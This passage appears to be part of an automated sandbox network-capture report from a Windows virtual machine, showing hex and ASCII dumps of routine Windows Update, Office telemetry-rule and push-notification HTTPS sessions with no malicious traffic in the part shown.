                                                                                                                                                                              Date: Thu, 21 Nov 2024 07:31:04 GMT
                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                              Content-Length: 1427
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT
                                                                                                                                                                              ETag: "0x8DC582BE56F6873"
                                                                                                                                                                              x-ms-request-id: 38a59648-401e-00ac-39a0-3b0a97000000
                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                              x-azure-ref: 20241121T073104Z-1777c6cb754dqf99hC1TEB5nps0000000ag000000000n97y
                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                              2024-11-21 07:31:04 UTC1427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 39 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75
                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703901" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ServiceabilityManager.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="Nexu


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              121192.168.2.6498654.175.87.197443
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-11-21 07:31:04 UTC306OUTGET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=WB29hw7aL49cTdZ&MD=L8dCy2SS HTTP/1.1
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Accept: */*
                                                                                                                                                                              User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                                                                                              Host: slscr.update.microsoft.com
                                                                                                                                                                              2024-11-21 07:31:05 UTC560INHTTP/1.1 200 OK
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                              Content-Type: application/octet-stream
                                                                                                                                                                              Expires: -1
                                                                                                                                                                              Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                                                                                              ETag: "vic+p1MiJJ+/WMnK08jaWnCBGDfvkGRzPk9f8ZadQHg=_1440"
                                                                                                                                                                              MS-CorrelationId: 7b0fa2f9-a82b-4847-b9df-8cf5c06a7b3c
                                                                                                                                                                              MS-RequestId: 690b0187-c5b4-4d79-b8b5-df9258c1a37b
                                                                                                                                                                              MS-CV: gvqza40Zm0+xcGpl.0
                                                                                                                                                                              X-Microsoft-SLSClientCache: 1440
                                                                                                                                                                              Content-Disposition: attachment; filename=environment.cab
                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                              Date: Thu, 21 Nov 2024 07:31:04 GMT
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Content-Length: 30005
                                                                                                                                                                              2024-11-21 07:31:05 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 8d 2b 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 5b 49 00 00 14 00 00 00 00 00 10 00 8d 2b 00 00 a8 49 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 72 4d 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 fe f6 51 be 21 2b 72 4d 43 4b ed 7c 05 58 54 eb da f6 14 43 49 37 0a 02 d2 b9 86 0e 41 52 a4 1b 24 a5 bb 43 24 44 18 94 90 92 52 41 3a 05 09 95 ee 54 b0 00 91 2e e9 12 10 04 11 c9 6f 10 b7 a2 67 9f bd cf 3e ff b7 ff b3 bf 73 ed e1 9a 99 f5 c6 7a d7 bb de f5 3e cf fd 3c f7 dc 17 4a 1a 52 e7 41 a8 97 1e 14 f4 e5 25 7d f4 05 82 82 c1 20 30 08 06 ba c3 05 02 11 7f a9 c1 ff d2 87 5c 1e f4 ed 65 8e 7a 1f f6 0a 40 03 1d 7b f9 83 2c 1c 2f db b8 3a 39 3a 58 38 ba 73 5e
                                                                                                                                                                              Data Ascii: MSCF+D[I+IdrMenvironment.cabQ!+rMCK|XTCI7AR$C$DRA:T.og>sz><JRA%} 0\ez@{,/:9:X8s^
                                                                                                                                                                              2024-11-21 07:31:05 UTC14181INData Raw: 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 26 30 24 06 03 55 04 03 13 1d 4d 69 63 72 6f 73 6f 66 74 20 54 69 6d 65 2d 53 74 61 6d 70 20 50 43 41 20 32 30 31 30 30 1e 17 0d 32 33 31 30 31 32 31 39 30 37 32 35 5a 17 0d 32 35 30 31 31 30 31 39 30 37 32 35 5a 30 81 d2 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 2d 30 2b 06 03 55 04 0b 13 24 4d 69 63 72 6f
                                                                                                                                                                              Data Ascii: UUS10UWashington10URedmond10UMicrosoft Corporation1&0$UMicrosoft Time-Stamp PCA 20100231012190725Z250110190725Z010UUS10UWashington10URedmond10UMicrosoft Corporation1-0+U$Micro


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                              122192.168.2.64988013.107.246.45443
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-11-21 07:31:06 UTC192OUTGET /rules/rule701501v1s19.xml HTTP/1.1
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                              2024-11-21 07:31:06 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Thu, 21 Nov 2024 07:31:06 GMT
                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                              Content-Length: 1401
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:48 GMT
                                                                                                                                                                              ETag: "0x8DC582BE2A9D541"
                                                                                                                                                                              x-ms-request-id: 2155ac17-401e-00a3-238c-3a8b09000000
                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                              x-azure-ref: 20241121T073106Z-178bfbc474bv7whqhC1NYC1fg40000000150000000007g1u
                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                              2024-11-21 07:31:06 UTC1401INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 63 75 72 69 74 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53
                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Security.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenS


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                              123192.168.2.64988113.107.246.45443
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-11-21 07:31:06 UTC192OUTGET /rules/rule701500v1s19.xml HTTP/1.1
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                              2024-11-21 07:31:06 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Thu, 21 Nov 2024 07:31:06 GMT
                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                              Content-Length: 1364
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                                                                                                                                                              ETag: "0x8DC582BEB6AD293"
                                                                                                                                                                              x-ms-request-id: c7391ddf-401e-0064-3568-3b54af000000
                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                              x-azure-ref: 20241121T073106Z-1777c6cb754mqztshC1TEB4mkc0000000aw0000000003xda
                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                              2024-11-21 07:31:06 UTC1364INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 35 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 63 75 72 69 74 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 65 63 75 72 69 74 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e
                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Security" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSecurity" S="Medium" /> <F T="2">


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                              124192.168.2.64988513.107.246.45443
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-11-21 07:31:06 UTC192OUTGET /rules/rule702800v1s19.xml HTTP/1.1
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                              2024-11-21 07:31:07 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Thu, 21 Nov 2024 07:31:06 GMT
                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                              Content-Length: 1354
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT
                                                                                                                                                                              ETag: "0x8DC582BE0662D7C"
                                                                                                                                                                              x-ms-request-id: c06a529d-f01e-0085-0e9a-3b88ea000000
                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                              x-azure-ref: 20241121T073106Z-r1d97b995778dpcthC1TEB4b5400000009y00000000072vf
                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                              2024-11-21 07:31:07 UTC1354INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 38 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 44 58 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 44 58 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f
                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702800" V="1" DC="SM" EN="Office.Telemetry.Event.Office.SDX" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSDX" S="Medium" /> <F T="2"> <O


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                              125192.168.2.64988340.113.110.67443
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-11-21 07:31:06 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 73 38 71 6c 58 52 6c 51 43 45 43 6e 38 71 51 75 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 35 37 34 34 65 33 34 36 64 37 65 61 35 32 37 31 0d 0a 0d 0a
                                                                                                                                                                              Data Ascii: CNT 1 CON 305MS-CV: s8qlXRlQCECn8qQu.1Context: 5744e346d7ea5271
                                                                                                                                                                              2024-11-21 07:31:06 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                                                                                                                                              Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                                                                                                                                              2024-11-21 07:31:06 UTC1084OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 73 38 71 6c 58 52 6c 51 43 45 43 6e 38 71 51 75 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 35 37 34 34 65 33 34 36 64 37 65 61 35 32 37 31 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 52 36 6d 33 39 2f 70 35 62 71 4b 33 4e 2b 6b 31 2f 6d 71 42 62 4a 55 63 34 6f 4d 32 4f 38 72 56 46 47 67 45 31 57 59 51 58 7a 4d 45 54 45 53 4c 64 78 61 30 61 4c 51 6d 79 35 5a 69 39 4e 52 39 35 34 2b 5a 2b 58 6f 72 68 48 59 36 74 36 33 73 53 2f 72 67 50 68 58 36 6f 4a 79 2f 61 71 61 6d 50 43 5a 31 54 74 62 61 65 4f 5a 46 69
                                                                                                                                                                              Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: s8qlXRlQCECn8qQu.2Context: 5744e346d7ea5271<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAR6m39/p5bqK3N+k1/mqBbJUc4oM2O8rVFGgE1WYQXzMETESLdxa0aLQmy5Zi9NR954+Z+XorhHY6t63sS/rgPhX6oJy/aqamPCZ1TtbaeOZFi
                                                                                                                                                                              2024-11-21 07:31:06 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 73 38 71 6c 58 52 6c 51 43 45 43 6e 38 71 51 75 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 35 37 34 34 65 33 34 36 64 37 65 61 35 32 37 31 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                                                                                                                                                                              Data Ascii: BND 3 CON\WNS 0 197MS-CV: s8qlXRlQCECn8qQu.3Context: 5744e346d7ea5271<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                                                                                                                                                                              2024-11-21 07:31:07 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                                                                                                                                              Data Ascii: 202 1 CON 58
                                                                                                                                                                              2024-11-21 07:31:07 UTC58INData Raw: 4d 53 2d 43 56 3a 20 44 51 68 4b 35 6d 6b 42 6f 45 4b 70 4f 66 52 4b 75 48 70 58 7a 67 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                                                                                                                                              Data Ascii: MS-CV: DQhK5mkBoEKpOfRKuHpXzg.0Payload parsing failed.


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                              126192.168.2.64988613.107.246.45443
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-11-21 07:31:06 UTC192OUTGET /rules/rule703351v0s19.xml HTTP/1.1
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                              2024-11-21 07:31:07 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Thu, 21 Nov 2024 07:31:06 GMT
                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                              Content-Length: 1403
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:39 GMT
                                                                                                                                                                              ETag: "0x8DC582BDCDD6400"
                                                                                                                                                                              x-ms-request-id: e8f84e55-c01e-0079-2269-3be51a000000
                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                              x-azure-ref: 20241121T073106Z-178bfbc474bgvl54hC1NYCsfuw000000016g000000003274
                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                              2024-11-21 07:31:07 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 33 35 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 63 72 69 70 74 4c 61 62 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703351" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ScriptLab.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                              127192.168.2.64988413.107.246.45443
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-11-21 07:31:06 UTC192OUTGET /rules/rule702801v1s19.xml HTTP/1.1
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                              2024-11-21 07:31:07 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Thu, 21 Nov 2024 07:31:07 GMT
                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                              Content-Length: 1391
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                                                                                                                                                                              ETag: "0x8DC582BDF58DC7E"
                                                                                                                                                                              x-ms-request-id: c0af4880-401e-00ac-328c-3a0a97000000
                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                              x-azure-ref: 20241121T073107Z-r1d97b99577tssmjhC1TEB8kan00000009x000000000akf4
                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                              2024-11-21 07:31:07 UTC1391INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 38 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 44 58 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 44 58 22 20 53
                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702801" V="1" DC="SM" EN="Office.Telemetry.Event.Office.SDX.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSDX" S


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                              128192.168.2.64989413.107.246.45443
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-11-21 07:31:08 UTC192OUTGET /rules/rule703350v0s19.xml HTTP/1.1
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                              2024-11-21 07:31:09 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Thu, 21 Nov 2024 07:31:08 GMT
                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                              Content-Length: 1366
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:42 GMT
                                                                                                                                                                              ETag: "0x8DC582BDF1E2608"
                                                                                                                                                                              x-ms-request-id: 5a5a14b6-c01e-0079-438c-3ae51a000000
                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                              x-azure-ref: 20241121T073108Z-1777c6cb754gvvgfhC1TEBz4rg0000000av0000000007yna
                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                              Accept-Ranges: bytes
